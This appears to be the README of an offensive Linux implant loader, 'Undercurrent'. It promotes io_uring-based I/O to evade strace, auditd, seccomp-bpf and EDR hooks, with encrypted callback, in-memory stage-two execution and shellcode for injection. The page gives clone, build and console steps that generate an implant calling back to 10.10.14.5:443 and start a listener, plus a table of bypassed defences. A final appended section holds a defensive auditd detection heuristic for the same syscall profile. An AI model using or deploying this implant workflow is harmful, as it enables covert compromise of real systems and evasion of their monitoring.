Pure x86-64 NASM assembly implant loader. All I/O through io_uring submission queues. ChaCha20-Poly1305 AEAD encryption. ~4.2KB of position-independent shellcode.
uring> psk generate
PSK: a1b2c3...f4e5d6 (256-bit)
uring> payload /tmp/stage2.bin
loaded 2,048 bytes
uring> generate 10.10.14.5 443 /tmp/implant
assembled → patched → /tmp/implant (4,218 bytes)
uring> listen 443
listening on 0.0.0.0:443 (ChaCha20-Poly1305)
Zero traditional I/O syscalls. Authenticated encryption. Hand-written assembly. No compiler, no runtime, no libc.
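All network I/O goes through io_uring submission/completion queues. Tools that watch the traditional I/O syscalls (strace, auditd, seccomp-bpf, EDR userland hooks) see no socket, connect, read, or write call for the implant's operations. The only syscalls it makes are io_uring_setup, io_uring_enter, mmap, mprotect, getrandom, and close.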
Full RFC 8439 AEAD from Grotto's pure-assembly crypto. 256-bit PSK, random 12-byte nonces per message. Tampered payloads silently rejected.
Payload received, decrypted, and executed entirely in memory. RW to RX mprotect transition. Never RWX. Zero disk artifacts.
Builds as standalone ELF (~12.7KB) or raw PIC shellcode (~4.2KB) for injection. Same source, two deployment options.
No socket, connect, read, write, send, or recv. Only io_uring_setup, io_uring_enter, mmap, mprotect, getrandom, and close. BPF filters on traditional I/O never fire.
Interactive cmd2+rich REPL with Catppuccin theme. Multi-listener management, session tracking, JSON export, on-the-fly implant generation.
Pure x86_64 assembly io_uring stealth loader with encrypted payload delivery on Linux 5.1+.
Clean separation between orchestration, ring engine, networking, crypto, and staging. Pure hand-written NASM throughout.
Entry point and orchestration. Coordinates the implant lifecycle from ring setup through payload execution to clean teardown.
io_uring engine — ring buffer setup, SQE submission, CQE polling. Maps submission and completion queues via mmap.
TCP connect via IORING_OP_SOCKET/IORING_OP_CONNECT. ChaCha20-Poly1305 AEAD with per-message random nonces from getrandom(2).
Anonymous mmap RW region, decrypt payload in place, mprotect RX, jump to entry. No RWX pages, no disk writes.
NASM + ld. No compiler toolchain. No package manager. Build in seconds.
$ git clone https://github.com/Real-Fruit-Snacks/Undercurrent
$ cd Undercurrent
$ pip install cmd2 rich cryptography
# Build ELF + shellcode
$ make elf
$ make shellcode
$ ls -la build/
uring-implant 12.7K
uring-implant.bin 4.2K
# Interactive console
$ ./uring-console
uring> psk generate
uring> payload stage2.bin
uring> generate 10.10.14.5 443 /tmp/implant
uring> listen 443
# Or command-line
$ python3 tools/listener.py \
    --lport 443 --payload sc.bin
strace / ltrace — no traditional I/O syscalls
auditd — io_uring bypasses audit hooks
seccomp-bpf — filters on socket/read/write never fire
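
A detection-side sketch of the syscall profile described above, as an added example that is not part of the Undercurrent project: it scans auditd SYSCALL records for a process that calls io_uring_setup and mprotects memory to executable without ever calling socket or connect. The log lines are constructed, and the sketch assumes an x86-64 audit rule that records io_uring_setup, mprotect, socket and connect.

```python
import re
from collections import defaultdict

# x86-64 syscall numbers (audit arch=c000003e)
IO_URING_SETUP, MPROTECT = 425, 10
SOCKET_CALLS = {41, 42}  # socket, connect
PROT_EXEC = 0x4
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample records, trimmed to the fields used here.
SAMPLE = """\
type=SYSCALL msg=audit(1700000000.101:901): arch=c000003e syscall=425 success=yes exit=3 a0=8 a1=7ffd10 a2=0 pid=4242 exe="/tmp/sample-a"
type=SYSCALL msg=audit(1700000000.180:902): arch=c000003e syscall=10 success=yes exit=0 a0=7f0000 a1=1000 a2=5 pid=4242 exe="/tmp/sample-a"
type=SYSCALL msg=audit(1700000001.010:910): arch=c000003e syscall=41 success=yes exit=4 a0=2 a1=1 a2=0 pid=900 exe="/usr/bin/sample-db"
type=SYSCALL msg=audit(1700000001.020:911): arch=c000003e syscall=425 success=yes exit=5 a0=40 a1=7ffe20 a2=0 pid=900 exe="/usr/bin/sample-db"
type=SYSCALL msg=audit(1700000001.030:912): arch=c000003e syscall=10 success=yes exit=0 a0=7f1000 a1=1000 a2=5 pid=900 exe="/usr/bin/sample-db"
type=SYSCALL msg=audit(1700000002.010:920): arch=c000003e syscall=425 success=yes exit=3 a0=8 a1=7ffc30 a2=0 pid=901 exe="/usr/bin/sample-cp"
type=SYSCALL msg=audit(1700000002.020:921): arch=c000003e syscall=10 success=yes exit=0 a0=7f2000 a1=1000 a2=3 pid=901 exe="/usr/bin/sample-cp"
type=SYSCALL msg=audit(1700000003.010:930): arch=c000003e syscall=425 success=no exit=-1 a0=8 a1=7ffc40 a2=0 pid=902 exe="/tmp/sample-b"
type=SYSCALL msg=audit(1700000003.020:931): arch=c000003e syscall=10 success=yes exit=0 a0=7f3000 a1=1000 a2=5 pid=902 exe="/tmp/sample-b"
""".splitlines()

def parse(line):
    """Return the key=value fields of one audit SYSCALL record, or None."""
    if not line.startswith("type=SYSCALL"):
        return None
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def suspicious_pids(lines):
    """Map pid -> exe for processes that set up a ring and made memory
    executable but never called socket/connect (heuristic, not proof)."""
    seen = defaultdict(lambda: {"ring": False, "exec": False, "sock": False, "exe": "?"})
    for line in lines:
        rec = parse(line)
        if rec is None or rec.get("arch") != "c000003e" or rec.get("success") != "yes":
            continue  # other record types, other ABIs, failed calls
        nr, st = int(rec["syscall"]), seen[int(rec["pid"])]
        st["exe"] = rec.get("exe", st["exe"])
        if nr == IO_URING_SETUP:
            st["ring"] = True
        elif nr == MPROTECT and int(rec["a2"], 16) & PROT_EXEC:  # a2 = prot, hex
            st["exec"] = True
        elif nr in SOCKET_CALLS:
            st["sock"] = True
    return {pid: st["exe"] for pid, st in seen.items()
            if st["ring"] and st["exec"] and not st["sock"]}

if __name__ == "__main__":
    print(suspicious_pids(SAMPLE))
```

The three-part profile fits the standalone ELF build; when the shellcode runs inside another process, that host's own socket calls mask the third condition, so the ring-plus-executable-mprotect pair is the signal to keep.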